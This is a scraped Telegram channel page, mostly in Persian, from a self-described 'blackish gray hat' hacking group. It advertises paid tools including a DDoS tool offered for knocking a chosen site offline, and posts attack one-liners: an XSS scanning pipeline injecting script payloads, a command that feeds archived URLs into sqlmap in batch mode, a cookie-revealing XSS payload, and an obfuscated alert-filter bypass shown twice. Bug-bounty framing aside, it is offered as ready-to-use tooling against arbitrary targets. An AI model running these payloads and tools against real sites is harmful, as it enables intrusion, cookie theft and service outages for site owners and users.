Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
105 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
Media is too big
VIEW IN TELEGRAM
🙂دسترسی به پنل ادمین - باگ SSRF🙂

🤔 توضحیات:
با استفاده از باگ ssrf میتونید به پنل ادمین دسترسی پیدا کنید و یکی از محبوب باگ برای هکرا در تست نفوذ است.

👾قسمت اول👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👍114🤯3
😎ابزار های ما:
🔥Ero-Hash
(شما با استفاده ابزار بالا که در نسخه تقدیم به شما میشه میتونید هش های خودتون رو به صورت تکی یا لیست کرک کنید)
💥DDos Ero
(با استفاده از این ابزار شما میتونید حمله سنگین دیداس رو روی سایت مورد نظرتون پیاده سازی کنید و سایت رو از دسترس خارج کنید)

Scan Ero
(با استفاده از ابزار اسکن یرو شما میتونید سایت مورد نظرتون رو اسکن کنید و میتونید بجز اسکن و پیدا کردن ای‌پی و... میتونید پنل ادمین روهم پیدا کنید)

‼️برای دریافت اطلاعات بیشتر و قیمت به ایدی زیر پیام بدید.
📌@GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
10🔥4🤯4
😠یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید

Link

#writeup
——————‌
@EroHack
☝️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯95👍3🔥1
👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln


⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty

🌐@EroHack
➡️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍3
SQLMap from Waybackurls ⚰️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"


#sql #sql_injection
——————‌
➡️@EroHack0
🙏Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🗿3🤯21
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
✔️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
7🤯4
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍9🗿21
خیلی کوتاه یه نکته بگم که احتمالاً ۹۰ درصدتون نمیدونستید

- اگر اشتباهی به جای Shutdown دستتون خورد روی Restart و نمی‌خواستید منتظر بمونید تا سیستمتون ری‌استارت بشه کافیه زمانی که صفحه ری‌استارت اومده بود دکمه Esc رو بزنید تا ازش خارج بشید ؛)
🤯5👍3🔥21
🔖Backup Files Finder

A Nuclei template that allows you to search for backup files on your target's website.


😴Github: 🔗Link

#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
👍6🤯2
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍7🔥1🤯1
ری اکشن بزار ببینم که میخوایم قوی شروع کنیم این مدت نبودیم😎
👍6👎1🔥1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «ری اکشن بزار ببینم که میخوایم قوی شروع کنیم این مدت نبودیم😎»
Eʀᴏ ··ʜᴀᴄᴋ··
یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0
و تنها در خواستی که دارم از شما کسایی که پریمیوم دارن چنل رو بوست کنن، ماهم از خجالتتون در میام🫶🏻
🔥4🗿21
⚠️To reach the area you want to reach, do three things:
1-Creativity
2- Risk tolerance
3-Doing

♻️Read the tweet now. Click here to see the tweet.
👍4🔥3
اینجا کسی هست دوره تست نفوذ به سایت(وب هکینگ) کوروش رو شرکت کرده باشه؟
Anonymous Poll
26%
+
74%
-
🤣6🗿4👎31
اون دسته از دوستانی که داخل دوره شرکت کردن راضی بودن؟ (وب‌هکینگ کوروش)
Anonymous Poll
31%
+
69%
-
👎10🗿5🤣2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
8🤯2👎1🗿1